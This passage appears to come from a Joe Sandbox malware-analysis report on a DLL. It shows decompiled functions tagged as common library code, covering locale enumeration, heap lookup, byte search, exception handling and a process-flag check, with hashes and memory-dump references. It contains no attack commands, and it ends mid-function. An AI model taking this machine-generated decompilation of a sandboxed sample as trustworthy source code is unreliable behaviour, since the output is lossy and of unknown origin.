              • EnumSystemLocalesW.KERNEL32(6DA9C614,00000001,?,?,-00000050,?,6DA9C9B6,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6DA9C380
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem
              • String ID:
              • API String ID: 2417226690-0
              • Opcode ID: e456c7c3ae31223ac98eef1bdcdfd39b6a95bb2c89f53cb177e2f511999e8a69
              • Instruction ID: 746895d8047ebc5defd9cda70448bfc39b3495009cf142adabd77cbaab16f216
              • Opcode Fuzzy Hash: e456c7c3ae31223ac98eef1bdcdfd39b6a95bb2c89f53cb177e2f511999e8a69
              • Instruction Fuzzy Hash: 2CF0F67A21C7056FDB145F35C880A7BBBE5EF81368F0A852CFA458F680C7799882C750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA96349 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 83%
              			E6DA96349(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				signed int _t29;
				void* _t31;

				_push(0xc);
				_push(0x6dab14e0);
				E6DA89CA0(__ebx, __edi, __esi);
				 *(_t31 - 0x1c) =  *(_t31 - 0x1c) & 0x00000000;
				E6DA8FB12( *((intOrPtr*)( *((intOrPtr*)(_t31 + 8)))));
				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
				 *0x6dad5b38 = E6DA91CA7( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)))))));
				_t29 = EnumSystemLocalesW(E6DA9633C, 1);
				_t17 =  *0x6dab3014; // 0x6c4e8ceb
				 *0x6dad5b38 = _t17;
				 *(_t31 - 0x1c) = _t29;
				 *(_t31 - 4) = 0xfffffffe;
				E6DA963B9();
				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0x10));
				return _t29;
			}






              0x6da96349
              0x6da9634b
              0x6da96350
              0x6da96355
              0x6da9635e
              0x6da96364
              0x6da96375
              0x6da96387
              0x6da96389
              0x6da9638e
              0x6da96393
              0x6da96396
              0x6da9639d
              0x6da963a7
              0x6da963b3

              APIs
                • Part of subcall function 6DA8FB12: RtlEnterCriticalSection.NTDLL(?), ref: 6DA8FB21
              • EnumSystemLocalesW.KERNEL32(6DA9633C,00000001,6DAB14E0,0000000C,6DA9670E,00000000), ref: 6DA96381
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: CriticalEnterEnumLocalesSectionSystem
              • String ID:
              • API String ID: 1272433827-0
              • Opcode ID: 8441ed519a422d6470bf2309ce48257087366940abf78c252d66a52ece89729b
              • Instruction ID: a58b87a5eab4b5158191941b8d8e8ad5943d773a0514586462bfc7f1f4e2fbe1
              • Opcode Fuzzy Hash: 8441ed519a422d6470bf2309ce48257087366940abf78c252d66a52ece89729b
              • Instruction Fuzzy Hash: 59F037B2A18200DFEB00CFA8D540BAD77F0EB4A324F10811AE6109B290DB7649818B91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9C250 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 100%
              			E6DA9C250(void* __ecx, void* __edx, signed char* _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				intOrPtr* _t15;
				void* _t19;
				void* _t21;
				void* _t22;

				_t19 = E6DA92BDC(__ecx, __edx, _t21);
				_t15 =  *((intOrPtr*)(_t19 + 0x54));
				_t22 = _t15 + 2;
				do {
					_t9 =  *_t15;
					_t15 = _t15 + 2;
				} while (_t9 != 0);
				 *(_t19 + 0x64) = 0 | _t15 - _t22 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(E6DA9C1A9, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}











              0x6da9c25c
              0x6da9c260
              0x6da9c263
              0x6da9c266
              0x6da9c266
              0x6da9c269
              0x6da9c26c
              0x6da9c284
              0x6da9c287
              0x6da9c28d
              0x6da9c293
              0x6da9c295
              0x00000000
              0x6da9c295
              0x6da9c29a

              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • EnumSystemLocalesW.KERNEL32(6DA9C1A9,00000001,?,?,?,6DA9CA14,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6DA9C287
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem
              • String ID:
              • API String ID: 2417226690-0
              • Opcode ID: 60e8bb2cd47bcd544bbf14e000117d50f303843ccc68cbdf0b04b8d7936e5dd7
              • Instruction ID: 18719b3a1d435db0bec737f8ef6d5d8ce466ceaa9c4ce4c82ae9835cbeab485a
              • Opcode Fuzzy Hash: 60e8bb2cd47bcd544bbf14e000117d50f303843ccc68cbdf0b04b8d7936e5dd7
              • Instruction Fuzzy Hash: 0DF0E53A3182069BDB04AF75D954A6A7FE4EFC1B24F0F4059EA098F680C67599C3C754
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA96812 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6DA94185,?,20001004,00000000,00000002,?,?,6DA93787), ref: 6DA96846
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: InfoLocale
              • String ID:
              • API String ID: 2299586839-0
              • Opcode ID: 9cf64e50fffb1dc24858935d0f50bb718feac82d587ffee6b793581cc4d86276
              • Instruction ID: 700642a75f917480584dc29d6ad7f0650d08c7ad9949064d08c3f8a2f6cffc0b
              • Opcode Fuzzy Hash: 9cf64e50fffb1dc24858935d0f50bb718feac82d587ffee6b793581cc4d86276
              • Instruction Fuzzy Hash: 73E04F35558229FBCF022FA0DC18F9E3FA9EF45750F09C024FD1469361CB728961AAD5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9A32E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E6DA9A32E() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x6dad5c48 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




              0x6da9a32e
              0x6da9a336
              0x6da9a33e

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: HeapProcess
              • String ID:
              • API String ID: 54951025-0
              • Opcode ID: f2023d458d7db4d49e524ac91f84148b5ddc8eba2ca7d33e0705ede91e19132b
              • Instruction ID: 99495a3a2eb68628b4cd55c29ceeeb523bdeb37b29a0cf76d3ea108072deeb6c
              • Opcode Fuzzy Hash: f2023d458d7db4d49e524ac91f84148b5ddc8eba2ca7d33e0705ede91e19132b
              • Instruction Fuzzy Hash: 2DA0113030A3028BCBA08E38830830C3AB8AA0B280B288028A008C0080EF20A0828A00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA97909 Relevance: .6, Instructions: 637COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c34f426b9a83df5c81076bf0e8f1d802ef1baa16c665cfed90a844d72875bc3a
              • Instruction ID: 36895f2eaaee776b5e8e31f4f394ae7578205e4533318056ed952f50620f5fc3
              • Opcode Fuzzy Hash: c34f426b9a83df5c81076bf0e8f1d802ef1baa16c665cfed90a844d72875bc3a
              • Instruction Fuzzy Hash: E532F522D7DF424DDB239534C83133AA798AFA73C4F19D727E819B9A99EB29C5C34140
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA8B200 Relevance: .1, Instructions: 76COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 100%
              			E6DA8B200(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										_t12 = _t39 - 4; // -12
										return _t12;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											_t11 = _t39 - 3; // -11
											return _t11;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												_t10 = _t39 - 2; // -10
												return _t10;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						_t9 = _t39 - 1; // -9
						return _t9;
					}
				}
				L24:
			}













              0x6da8b200
              0x6da8b207
              0x6da8b25c
              0x6da8b25c
              0x6da8b209
              0x6da8b209
              0x6da8b20f
              0x6da8b219
              0x6da8b231
              0x6da8b231
              0x6da8b234
              0x6da8b248
              0x6da8b248
              0x6da8b24b
              0x00000000
              0x6da8b24d
              0x6da8b24d
              0x6da8b24d
              0x6da8b24f
              0x6da8b254
              0x00000000
              0x00000000
              0x6da8b256
              0x6da8b259
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da8b259
              0x00000000
              0x6da8b24d
              0x6da8b236
              0x6da8b243
              0x6da8b262
              0x6da8b264
              0x6da8b272
              0x6da8b27b
              0x00000000
              0x6da8b27d
              0x6da8b280
              0x6da8b282
              0x6da8b2a7
              0x6da8b2ac
              0x6da8b284
              0x6da8b284
              0x6da8b286
              0x6da8b2a1
              0x6da8b2a6
              0x6da8b288
              0x6da8b28b
              0x6da8b28d
              0x6da8b29b
              0x6da8b2a0
              0x6da8b28f
              0x6da8b291
              0x00000000
              0x6da8b293
              0x00000000
              0x6da8b293
              0x6da8b291
              0x6da8b28d
              0x6da8b286
              0x6da8b282
              0x00000000
              0x6da8b25d
              0x6da8b25d
              0x6da8b25d
              0x00000000
              0x6da8b247
              0x6da8b21b
              0x6da8b21b
              0x6da8b21b
              0x6da8b21d
              0x6da8b222
              0x00000000
              0x00000000
              0x6da8b224
              0x6da8b227
              0x00000000
              0x6da8b229
              0x6da8b22f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da8b22f
              0x00000000
              0x6da8b227
              0x6da8b296
              0x6da8b296
              0x6da8b29a
              0x6da8b29a
              0x6da8b219
              0x00000000

              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
              • Instruction ID: 6af97e463d43c3e9e4c92b6e9292d60c92e50216347e79e044ddd874f0d70bab
              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
              • Instruction Fuzzy Hash: 8E11297B24814387D340C96DC8B47BFE795FAC6225B2C4365D8754BA56F123A0C19502
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA99229 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 100%
              			E6DA99229(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E6DA96660(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}






              0x6da99236
              0x6da99238
              0x6da9923b
              0x6da9923e
              0x6da99241
              0x6da99252
              0x6da99254
              0x6da99243
              0x6da99247
              0x6da99250
              0x00000000
              0x00000000
              0x6da99250
              0x6da99259

              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 311848273280192d40b1ad7f5b0b063147d93dba66c321036d0fe31074e24a83
              • Instruction ID: 8193f4c6d02980ed11aa4bc0972faf0c17fac94b7b09d7a6a9149804112d610f
              • Opcode Fuzzy Hash: 311848273280192d40b1ad7f5b0b063147d93dba66c321036d0fe31074e24a83
              • Instruction Fuzzy Hash: 3EE08C32929228EBCB14CB98CA04E8AB3ECEB84B50F1504A6F605D7200C270DE40CBC1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA91610 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 100%
              			E6DA91610(void* __ecx, void* __eflags) {

				if(E6DA99229(__ecx) == 1 || ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) != 0) {
					return 0;
				} else {
					return 1;
				}
			}



              0x6da91618
              0x6da91631
              0x6da9162c
              0x6da9162e
              0x6da9162e

              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a50bd0236d097da5bf19158a0a6e12620a5b0abaf9b60c89cfa537db934b0c82
              • Instruction ID: 93778f8babb8e045a1aa603f74e81501b8f2865ad1f5038fd95ca28b557c45fc
              • Opcode Fuzzy Hash: a50bd0236d097da5bf19158a0a6e12620a5b0abaf9b60c89cfa537db934b0c82
              • Instruction Fuzzy Hash: 66C0803CC1C50046DE055614937037473DBA381782F483CCCC6024F641C51D58C1D601
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA8C7DF Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 73%
              			E6DA8C7DF(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6DA8D748(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6DA90BF9(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_t203 = E6DA8C463(_t275, _t279, _t300, _t305, _t319, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6DA8C463(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6DA8A418(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6DA8A34B(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6DA8C75F(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6DA90BF9(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
